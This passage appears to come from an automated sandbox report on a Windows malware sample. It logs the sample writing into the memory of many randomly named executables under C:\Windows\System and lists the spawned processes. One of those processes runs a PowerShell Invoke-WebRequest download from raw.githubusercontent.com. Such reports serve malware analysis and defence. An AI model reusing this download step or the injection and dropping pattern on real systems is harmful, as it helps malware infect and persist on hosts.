PID 2944 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\lJTSWAI.exe
PID 2944 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FAtBTQW.exe
PID 2944 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FAtBTQW.exe
PID 2944 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FAtBTQW.exe
PID 2944 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\irYyHHH.exe
PID 2944 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\irYyHHH.exe
PID 2944 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\irYyHHH.exe
PID 2944 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\lAmdSNg.exe
PID 2944 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\lAmdSNg.exe
PID 2944 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\lAmdSNg.exe
PID 2944 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\dWUHejK.exe
PID 2944 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\dWUHejK.exe
PID 2944 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\dWUHejK.exe
PID 2944 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\cwjhGdI.exe
PID 2944 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\cwjhGdI.exe
PID 2944 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\cwjhGdI.exe
PID 2944 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\RQXaead.exe
PID 2944 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\RQXaead.exe
PID 2944 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\RQXaead.exe
PID 2944 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BvJFzGC.exe
PID 2944 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BvJFzGC.exe
PID 2944 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BvJFzGC.exe
PID 2944 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BvzODwb.exe
PID 2944 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BvzODwb.exe
PID 2944 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BvzODwb.exe
PID 2944 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\ggSWvZU.exe
PID 2944 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\ggSWvZU.exe
PID 2944 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\ggSWvZU.exe
PID 2944 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\fKWnkZS.exe
PID 2944 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\fKWnkZS.exe
PID 2944 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\fKWnkZS.exe
PID 2944 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\CgGAGbN.exe
PID 2944 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\CgGAGbN.exe
PID 2944 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\CgGAGbN.exe
PID 2944 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\ZdaqaXL.exe
PID 2944 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\ZdaqaXL.exe
PID 2944 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\ZdaqaXL.exe
PID 2944 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\zSjaltF.exe
PID 2944 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\zSjaltF.exe
PID 2944 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\zSjaltF.exe
PID 2944 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\wNVhfXN.exe
PID 2944 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\wNVhfXN.exe
PID 2944 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\wNVhfXN.exe
PID 2944 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\SOoPPnV.exe
PID 2944 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\SOoPPnV.exe
PID 2944 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\SOoPPnV.exe
PID 2944 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\bZcGdyX.exe

Processes

C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\MmzZyVw.exe

C:\Windows\System\MmzZyVw.exe

C:\Windows\System\UJbVddf.exe

C:\Windows\System\UJbVddf.exe

C:\Windows\System\VwcbDvJ.exe

C:\Windows\System\VwcbDvJ.exe

C:\Windows\System\SOtqlrq.exe

C:\Windows\System\SOtqlrq.exe

C:\Windows\System\lJTSWAI.exe

C:\Windows\System\lJTSWAI.exe

C:\Windows\System\FAtBTQW.exe

C:\Windows\System\FAtBTQW.exe

C:\Windows\System\irYyHHH.exe

C:\Windows\System\irYyHHH.exe

C:\Windows\System\lAmdSNg.exe

C:\Windows\System\lAmdSNg.exe

C:\Windows\System\dWUHejK.exe

C:\Windows\System\dWUHejK.exe

C:\Windows\System\cwjhGdI.exe

C:\Windows\System\cwjhGdI.exe

C:\Windows\System\RQXaead.exe

C:\Windows\System\RQXaead.exe

C:\Windows\System\BvJFzGC.exe

C:\Windows\System\BvJFzGC.exe

C:\Windows\System\BvzODwb.exe

C:\Windows\System\BvzODwb.exe

C:\Windows\System\ggSWvZU.exe

C:\Windows\System\ggSWvZU.exe

C:\Windows\System\fKWnkZS.exe

C:\Windows\System\fKWnkZS.exe

C:\Windows\System\CgGAGbN.exe

C:\Windows\System\CgGAGbN.exe

C:\Windows\System\ZdaqaXL.exe

C:\Windows\System\ZdaqaXL.exe

C:\Windows\System\zSjaltF.exe

C:\Windows\System\zSjaltF.exe

C:\Windows\System\wNVhfXN.exe

C:\Windows\System\wNVhfXN.exe

C:\Windows\System\SOoPPnV.exe

C:\Windows\System\SOoPPnV.exe

C:\Windows\System\bZcGdyX.exe

C:\Windows\System\bZcGdyX.exe

C:\Windows\System\DUJukZH.exe

C:\Windows\System\DUJukZH.exe

C:\Windows\System\yCxHXfY.exe

C:\Windows\System\yCxHXfY.exe

C:\Windows\System\PPRAmWH.exe

C:\Windows\System\PPRAmWH.exe

C:\Windows\System\yTzlWJD.exe

C:\Windows\System\yTzlWJD.exe

C:\Windows\System\Qgxxpbt.exe

C:\Windows\System\Qgxxpbt.exe

C:\Windows\System\ffjrNUO.exe

C:\Windows\System\ffjrNUO.exe

C:\Windows\System\xqRPAQy.exe

C:\Windows\System\xqRPAQy.exe

C:\Windows\System\dykxEMP.exe

C:\Windows\System\dykxEMP.exe

C:\Windows\System\vveTePb.exe

C:\Windows\System\vveTePb.exe

C:\Windows\System\BBVjZpy.exe

C:\Windows\System\BBVjZpy.exe

C:\Windows\System\vUfOhJm.exe

C:\Windows\System\vUfOhJm.exe

C:\Windows\System\XATUWRa.exe

C:\Windows\System\XATUWRa.exe

C:\Windows\System\qHYbYrJ.exe

C:\Windows\System\qHYbYrJ.exe

C:\Windows\System\GJVfUrS.exe

C:\Windows\System\GJVfUrS.exe

C:\Windows\System\hpjuQFi.exe

C:\Windows\System\hpjuQFi.exe

C:\Windows\System\xKrpqqH.exe

C:\Windows\System\xKrpqqH.exe

C:\Windows\System\YeaCzxq.exe

C:\Windows\System\YeaCzxq.exe

C:\Windows\System\klNqSjZ.exe

C:\Windows\System\klNqSjZ.exe

C:\Windows\System\TDoijeU.exe

C:\Windows\System\TDoijeU.exe

C:\Windows\System\bNCbPWi.exe

C:\Windows\System\bNCbPWi.exe

C:\Windows\System\XkFnCVg.exe

C:\Windows\System\XkFnCVg.exe

C:\Windows\System\pgssfdG.exe

C:\Windows\System\pgssfdG.exe

C:\Windows\System\KXnVWTB.exe

C:\Windows\System\KXnVWTB.exe

C:\Windows\System\iOmywPv.exe

C:\Windows\System\iOmywPv.exe

C:\Windows\System\rerNJQn.exe

C:\Windows\System\rerNJQn.exe

C:\Windows\System\iPYOyFv.exe

C:\Windows\System\iPYOyFv.exe

C:\Windows\System\BCQcRTu.exe

C:\Windows\System\BCQcRTu.exe

C:\Windows\System\LJtOFAw.exe

C:\Windows\System\LJtOFAw.exe

C:\Windows\System\oFCKjmX.exe

C:\Windows\System\oFCKjmX.exe

C:\Windows\System\ocmfrEr.exe

C:\Windows\System\ocmfrEr.exe

C:\Windows\System\JSiYGXQ.exe

C:\Windows\System\JSiYGXQ.exe

C:\Windows\System\HyISCiA.exe

C:\Windows\System\HyISCiA.exe

C:\Windows\System\EDCcqaZ.exe

C:\Windows\System\EDCcqaZ.exe

C:\Windows\System\pPZUzgm.exe

C:\Windows\System\pPZUzgm.exe

C:\Windows\System\zeZuiWb.exe

C:\Windows\System\zeZuiWb.exe

C:\Windows\System\jixIaPN.exe

C:\Windows\System\jixIaPN.exe

C:\Windows\System\ynifzlK.exe

C:\Windows\System\ynifzlK.exe

C:\Windows\System\iWetlBw.exe

C:\Windows\System\iWetlBw.exe

C:\Windows\System\RdriDZE.exe

C:\Windows\System\RdriDZE.exe

C:\Windows\System\MtaytWT.exe

C:\Windows\System\MtaytWT.exe

C:\Windows\System\DTRCxSm.exe

C:\Windows\System\DTRCxSm.exe

C:\Windows\System\vHuaZSR.exe

C:\Windows\System\vHuaZSR.exe

C:\Windows\System\SnQzkId.exe

C:\Windows\System\SnQzkId.exe

C:\Windows\System\UOLhwUK.exe

C:\Windows\System\UOLhwUK.exe

C:\Windows\System\HIBqZxd.exe

C:\Windows\System\HIBqZxd.exe

C:\Windows\System\YRAvXgZ.exe

C:\Windows\System\YRAvXgZ.exe

C:\Windows\System\GjSwpzk.exe

C:\Windows\System\GjSwpzk.exe

C:\Windows\System\VFPrdjD.exe

C:\Windows\System\VFPrdjD.exe

C:\Windows\System\IYEOOMH.exe

C:\Windows\System\IYEOOMH.exe

C:\Windows\System\vnqnWQL.exe

C:\Windows\System\vnqnWQL.exe

C:\Windows\System\RJlJBVU.exe

C:\Windows\System\RJlJBVU.exe

C:\Windows\System\ThGzaoo.exe

C:\Windows\System\ThGzaoo.exe

C:\Windows\System\yfJqMuv.exe

C:\Windows\System\yfJqMuv.exe

C:\Windows\System\HtNhlbk.exe

C:\Windows\System\HtNhlbk.exe

C:\Windows\System\MRsWrbE.exe

C:\Windows\System\MRsWrbE.exe

C:\Windows\System\kHDSlCY.exe

C:\Windows\System\kHDSlCY.exe

C:\Windows\System\URxSueI.exe

C:\Windows\System\URxSueI.exe

C:\Windows\System\oSIZgiP.exe

C:\Windows\System\oSIZgiP.exe

C:\Windows\System\PsctDYe.exe

C:\Windows\System\PsctDYe.exe

C:\Windows\System\oqEtjNX.exe

C:\Windows\System\oqEtjNX.exe

C:\Windows\System\NwMgZjd.exe

C:\Windows\System\NwMgZjd.exe

C:\Windows\System\IzdwsIt.exe

C:\Windows\System\IzdwsIt.exe

C:\Windows\System\LhQiwse.exe

C:\Windows\System\LhQiwse.exe

C:\Windows\System\NTtDjhk.exe

C:\Windows\System\NTtDjhk.exe

C:\Windows\System\gMJKJoW.exe

C:\Windows\System\gMJKJoW.exe

C:\Windows\System\WQOMzgv.exe

C:\Windows\System\WQOMzgv.exe

C:\Windows\System\hPSJQTl.exe

C:\Windows\System\hPSJQTl.exe

C:\Windows\System\EEnAOSz.exe

C:\Windows\System\EEnAOSz.exe

C:\Windows\System\lQaxjSw.exe

C:\Windows\System\lQaxjSw.exe

C:\Windows\System\BZHpxvx.exe

C:\Windows\System\BZHpxvx.exe

C:\Windows\System\EhHIUlY.exe

C:\Windows\System\EhHIUlY.exe

C:\Windows\System\bNjuScr.exe

C:\Windows\System\bNjuScr.exe

C:\Windows\System\KmEqRva.exe

C:\Windows\System\KmEqRva.exe

C:\Windows\System\ZydQwxN.exe

C:\Windows\System\ZydQwxN.exe

C:\Windows\System\KWGsMfp.exe

C:\Windows\System\KWGsMfp.exe

C:\Windows\System\CtooMBC.exe

C:\Windows\System\CtooMBC.exe

C:\Windows\System\RCMlEAO.exe

C:\Windows\System\RCMlEAO.exe

C:\Windows\System\EGAjMGB.exe

C:\Windows\System\EGAjMGB.exe

C:\Windows\System\EsloAme.exe

C:\Windows\System\EsloAme.exe

C:\Windows\System\HwbdFQs.exe

C:\Windows\System\HwbdFQs.exe

C:\Windows\System\FCWbixp.exe

C:\Windows\System\FCWbixp.exe

C:\Windows\System\eTvJMuB.exe

C:\Windows\System\eTvJMuB.exe

C:\Windows\System\WwZyzur.exe

C:\Windows\System\WwZyzur.exe

C:\Windows\System\mpjdMBH.exe

C:\Windows\System\mpjdMBH.exe

C:\Windows\System\rWTHHNN.exe

C:\Windows\System\rWTHHNN.exe

C:\Windows\System\VEyyVNa.exe

C:\Windows\System\VEyyVNa.exe

C:\Windows\System\CKxMYjM.exe

C:\Windows\System\CKxMYjM.exe

C:\Windows\System\MmFLUKc.exe

C:\Windows\System\MmFLUKc.exe

C:\Windows\System\fcBuPDY.exe

C:\Windows\System\fcBuPDY.exe

C:\Windows\System\WLHQyCv.exe

C:\Windows\System\WLHQyCv.exe

C:\Windows\System\wwikcQd.exe

C:\Windows\System\wwikcQd.exe

C:\Windows\System\kGMlNnt.exe

C:\Windows\System\kGMlNnt.exe

C:\Windows\System\OPdZvWC.exe

C:\Windows\System\OPdZvWC.exe

C:\Windows\System\jGIsNma.exe

C:\Windows\System\jGIsNma.exe

C:\Windows\System\chgLutE.exe

C:\Windows\System\chgLutE.exe

C:\Windows\System\zzpKnBm.exe

C:\Windows\System\zzpKnBm.exe

C:\Windows\System\vPjocyq.exe

C:\Windows\System\vPjocyq.exe

C:\Windows\System\PCNDNol.exe

C:\Windows\System\PCNDNol.exe

C:\Windows\System\xmQhBJp.exe

C:\Windows\System\xmQhBJp.exe

C:\Windows\System\NJJJLOe.exe

C:\Windows\System\NJJJLOe.exe

C:\Windows\System\xeLylgD.exe

C:\Windows\System\xeLylgD.exe

C:\Windows\System\GrzegEs.exe

C:\Windows\System\GrzegEs.exe

C:\Windows\System\ZWJJoQC.exe

C:\Windows\System\ZWJJoQC.exe

C:\Windows\System\OsmtXTD.exe

C:\Windows\System\OsmtXTD.exe

C:\Windows\System\qDqLbiG.exe

C:\Windows\System\qDqLbiG.exe

C:\Windows\System\pMgXoir.exe

C:\Windows\System\pMgXoir.exe

C:\Windows\System\HjwYuSJ.exe

C:\Windows\System\HjwYuSJ.exe

C:\Windows\System\ZeSRlMM.exe

C:\Windows\System\ZeSRlMM.exe

C:\Windows\System\tzYJuEh.exe

C:\Windows\System\tzYJuEh.exe

C:\Windows\System\uydtgsP.exe

C:\Windows\System\uydtgsP.exe

C:\Windows\System\LutixkG.exe

C:\Windows\System\LutixkG.exe

C:\Windows\System\ZVseOgx.exe

C:\Windows\System\ZVseOgx.exe

C:\Windows\System\AXQTopt.exe

C:\Windows\System\AXQTopt.exe

C:\Windows\System\yiwESqP.exe

C:\Windows\System\yiwESqP.exe

C:\Windows\System\UDYKFnW.exe

C:\Windows\System\UDYKFnW.exe

C:\Windows\System\nnaqKRN.exe

C:\Windows\System\nnaqKRN.exe

C:\Windows\System\SgEVwKl.exe

C:\Windows\System\SgEVwKl.exe

C:\Windows\System\NADvDHN.exe

C:\Windows\System\NADvDHN.exe

C:\Windows\System\RKSXOdv.exe

C:\Windows\System\RKSXOdv.exe

C:\Windows\System\LrkopXt.exe

C:\Windows\System\LrkopXt.exe

C:\Windows\System\BhXlyXF.exe

C:\Windows\System\BhXlyXF.exe

C:\Windows\System\DeNvonR.exe

C:\Windows\System\DeNvonR.exe

C:\Windows\System\gNuBhZC.exe

C:\Windows\System\gNuBhZC.exe

C:\Windows\System\gLQlztD.exe

C:\Windows\System\gLQlztD.exe

C:\Windows\System\GPlkGsH.exe

C:\Windows\System\GPlkGsH.exe

C:\Windows\System\TuvezLT.exe

C:\Windows\System\TuvezLT.exe

C:\Windows\System\QPvlBuU.exe

C:\Windows\System\QPvlBuU.exe

C:\Windows\System\fafPSPv.exe

C:\Windows\System\fafPSPv.exe

C:\Windows\System\uMneOEy.exe

C:\Windows\System\uMneOEy.exe

C:\Windows\System\hZuhyau.exe

C:\Windows\System\hZuhyau.exe

C:\Windows\System\nEUNgTu.exe

C:\Windows\System\nEUNgTu.exe

C:\Windows\System\qsmcOfM.exe

C:\Windows\System\qsmcOfM.exe

C:\Windows\System\WxkmwpS.exe

C:\Windows\System\WxkmwpS.exe

C:\Windows\System\LYZtTTK.exe

C:\Windows\System\LYZtTTK.exe

C:\Windows\System\csIhHDW.exe

C:\Windows\System\csIhHDW.exe

C:\Windows\System\AwpuhyG.exe

C:\Windows\System\AwpuhyG.exe

C:\Windows\System\TkEGdtW.exe

C:\Windows\System\TkEGdtW.exe

C:\Windows\System\HSvlOuK.exe

C:\Windows\System\HSvlOuK.exe

C:\Windows\System\cGKQpNq.exe

C:\Windows\System\cGKQpNq.exe

C:\Windows\System\egUIBtu.exe

C:\Windows\System\egUIBtu.exe

C:\Windows\System\rWtxLVx.exe

C:\Windows\System\rWtxLVx.exe

C:\Windows\System\aJXuLvO.exe

C:\Windows\System\aJXuLvO.exe

C:\Windows\System\oveKTQG.exe

C:\Windows\System\oveKTQG.exe

C:\Windows\System\NIcnIpL.exe

C:\Windows\System\NIcnIpL.exe

C:\Windows\System\IUsMELe.exe

C:\Windows\System\IUsMELe.exe

C:\Windows\System\aEoIdXS.exe

C:\Windows\System\aEoIdXS.exe

C:\Windows\System\tjuZsmc.exe

C:\Windows\System\tjuZsmc.exe

C:\Windows\System\mpXnmNJ.exe

C:\Windows\System\mpXnmNJ.exe

C:\Windows\System\JynZZhQ.exe

C:\Windows\System\JynZZhQ.exe

C:\Windows\System\tVpbeJR.exe

C:\Windows\System\tVpbeJR.exe

C:\Windows\System\UxXHxsf.exe

C:\Windows\System\UxXHxsf.exe

C:\Windows\System\PzomkcT.exe

C:\Windows\System\PzomkcT.exe

C:\Windows\System\hyCrQXV.exe

C:\Windows\System\hyCrQXV.exe

C:\Windows\System\ImheqYH.exe

C:\Windows\System\ImheqYH.exe

C:\Windows\System\vgdjtYC.exe

C:\Windows\System\vgdjtYC.exe

C:\Windows\System\feSJFfk.exe

C:\Windows\System\feSJFfk.exe

C:\Windows\System\vDouZQA.exe

C:\Windows\System\vDouZQA.exe

C:\Windows\System\SKgiZoA.exe

C:\Windows\System\SKgiZoA.exe

C:\Windows\System\Ibsmbsk.exe

C:\Windows\System\Ibsmbsk.exe

C:\Windows\System\uQPdNPv.exe

C:\Windows\System\uQPdNPv.exe

C:\Windows\System\huuYYPZ.exe

C:\Windows\System\huuYYPZ.exe

C:\Windows\System\mMoaGNh.exe

C:\Windows\System\mMoaGNh.exe

C:\Windows\System\DwkRNOV.exe

C:\Windows\System\DwkRNOV.exe

C:\Windows\System\MyTHNqX.exe

C:\Windows\System\MyTHNqX.exe

C:\Windows\System\DCVOwKS.exe

C:\Windows\System\DCVOwKS.exe

C:\Windows\System\WINBlHf.exe

C:\Windows\System\WINBlHf.exe

C:\Windows\System\GLxsxpZ.exe

C:\Windows\System\GLxsxpZ.exe

C:\Windows\System\XpkmbXV.exe

C:\Windows\System\XpkmbXV.exe

C:\Windows\System\sjVRkeS.exe

C:\Windows\System\sjVRkeS.exe

C:\Windows\System\WjDNecO.exe

C:\Windows\System\WjDNecO.exe

C:\Windows\System\fhgoRPE.exe

C:\Windows\System\fhgoRPE.exe

C:\Windows\System\gRLeGxS.exe

C:\Windows\System\gRLeGxS.exe

C:\Windows\System\scgltOD.exe

C:\Windows\System\scgltOD.exe

C:\Windows\System\wBOszXL.exe

C:\Windows\System\wBOszXL.exe

C:\Windows\System\WZrgAqI.exe

C:\Windows\System\WZrgAqI.exe

C:\Windows\System\xfxwAFx.exe

C:\Windows\System\xfxwAFx.exe

C:\Windows\System\OdwkFPw.exe

C:\Windows\System\OdwkFPw.exe

C:\Windows\System\jQfpBNM.exe

C:\Windows\System\jQfpBNM.exe

C:\Windows\System\rWUqjFH.exe

C:\Windows\System\rWUqjFH.exe

C:\Windows\System\QoNWBAE.exe

C:\Windows\System\QoNWBAE.exe

C:\Windows\System\vizTyBW.exe

C:\Windows\System\vizTyBW.exe

C:\Windows\System\aYejCjV.exe

C:\Windows\System\aYejCjV.exe

C:\Windows\System\vOvoNMH.exe

C:\Windows\System\vOvoNMH.exe

C:\Windows\System\ZJRomaU.exe

C:\Windows\System\ZJRomaU.exe

C:\Windows\System\gcbBBaW.exe

C:\Windows\System\gcbBBaW.exe

C:\Windows\System\wMoSDKQ.exe

C:\Windows\System\wMoSDKQ.exe

C:\Windows\System\dXdflEA.exe

C:\Windows\System\dXdflEA.exe

C:\Windows\System\lrPontA.exe

C:\Windows\System\lrPontA.exe

C:\Windows\System\kbzTUkB.exe

C:\Windows\System\kbzTUkB.exe

C:\Windows\System\VOUBTnl.exe

C:\Windows\System\VOUBTnl.exe

C:\Windows\System\kYYwlqP.exe

C:\Windows\System\kYYwlqP.exe

C:\Windows\System\teFRXVm.exe

C:\Windows\System\teFRXVm.exe

C:\Windows\System\THgCfOn.exe

C:\Windows\System\THgCfOn.exe

C:\Windows\System\JpUvFCe.exe

C:\Windows\System\JpUvFCe.exe

C:\Windows\System\VrGuZOJ.exe

C:\Windows\System\VrGuZOJ.exe

C:\Windows\System\rzwUhui.exe

C:\Windows\System\rzwUhui.exe

C:\Windows\System\egPWGnG.exe

C:\Windows\System\egPWGnG.exe

C:\Windows\System\IsDziRe.exe

C:\Windows\System\IsDziRe.exe

C:\Windows\System\qGoOWLh.exe

C:\Windows\System\qGoOWLh.exe

C:\Windows\System\KVlMScU.exe

C:\Windows\System\KVlMScU.exe

C:\Windows\System\xUeFzAm.exe

C:\Windows\System\xUeFzAm.exe

C:\Windows\System\yBUqAMz.exe

C:\Windows\System\yBUqAMz.exe

C:\Windows\System\jKyaTtK.exe

C:\Windows\System\jKyaTtK.exe

C:\Windows\System\QDHdSDj.exe

C:\Windows\System\QDHdSDj.exe

C:\Windows\System\KEjPnlD.exe

C:\Windows\System\KEjPnlD.exe

C:\Windows\System\EUPrDwi.exe

C:\Windows\System\EUPrDwi.exe

C:\Windows\System\aOVEubL.exe

C:\Windows\System\aOVEubL.exe

C:\Windows\System\OgVLStw.exe

C:\Windows\System\OgVLStw.exe

C:\Windows\System\tiUqRaG.exe

C:\Windows\System\tiUqRaG.exe

C:\Windows\System\YQLQGJL.exe

C:\Windows\System\YQLQGJL.exe

C:\Windows\System\wepWfSl.exe

C:\Windows\System\wepWfSl.exe

C:\Windows\System\oMBwHyM.exe

C:\Windows\System\oMBwHyM.exe

C:\Windows\System\UaCGSzG.exe

C:\Windows\System\UaCGSzG.exe

C:\Windows\System\VUoyHwO.exe

C:\Windows\System\VUoyHwO.exe

C:\Windows\System\HPXuhZI.exe

C:\Windows\System\HPXuhZI.exe

C:\Windows\System\VVwrzSe.exe

C:\Windows\System\VVwrzSe.exe

C:\Windows\System\ZHFFwcy.exe

C:\Windows\System\ZHFFwcy.exe

C:\Windows\System\LYaBNDA.exe

C:\Windows\System\LYaBNDA.exe

C:\Windows\System\tpAgsLO.exe

C:\Windows\System\tpAgsLO.exe

C:\Windows\System\PNqclsH.exe

C:\Windows\System\PNqclsH.exe

C:\Windows\System\MvsSUmN.exe

C:\Windows\System\MvsSUmN.exe

C:\Windows\System\NrEyWEd.exe

C:\Windows\System\NrEyWEd.exe

C:\Windows\System\ugbNCIx.exe

C:\Windows\System\ugbNCIx.exe

C:\Windows\System\enqidYj.exe

C:\Windows\System\enqidYj.exe

C:\Windows\System\Yldlpps.exe

C:\Windows\System\Yldlpps.exe

C:\Windows\System\fWeaLDy.exe

C:\Windows\System\fWeaLDy.exe

C:\Windows\System\MjkHonU.exe

C:\Windows\System\MjkHonU.exe

C:\Windows\System\mbYZSEZ.exe

C:\Windows\System\mbYZSEZ.exe

C:\Windows\System\CvUJlTn.exe

C:\Windows\System\CvUJlTn.exe

C:\Windows\System\pHrbvBc.exe

C:\Windows\System\pHrbvBc.exe

C:\Windows\System\BGcPVjM.exe

C:\Windows\System\BGcPVjM.exe

C:\Windows\System\MyapdPW.exe

C:\Windows\System\MyapdPW.exe

C:\Windows\System\rFreQcr.exe

C:\Windows\System\rFreQcr.exe

C:\Windows\System\cmGKUCN.exe

C:\Windows\System\cmGKUCN.exe

C:\Windows\System\jcIVfPh.exe

C:\Windows\System\jcIVfPh.exe

C:\Windows\System\lcfqHUJ.exe

C:\Windows\System\lcfqHUJ.exe

C:\Windows\System\RCQceMY.exe

C:\Windows\System\RCQceMY.exe

C:\Windows\System\uJNCkqm.exe

C:\Windows\System\uJNCkqm.exe

C:\Windows\System\LGPrWmD.exe

C:\Windows\System\LGPrWmD.exe

C:\Windows\System\ImeLFFg.exe

C:\Windows\System\ImeLFFg.exe

C:\Windows\System\FmiZLjz.exe

C:\Windows\System\FmiZLjz.exe

C:\Windows\System\VyqXAVe.exe

C:\Windows\System\VyqXAVe.exe

C:\Windows\System\JXEIHNW.exe

C:\Windows\System\JXEIHNW.exe

C:\Windows\System\TsbaUsT.exe

C:\Windows\System\TsbaUsT.exe

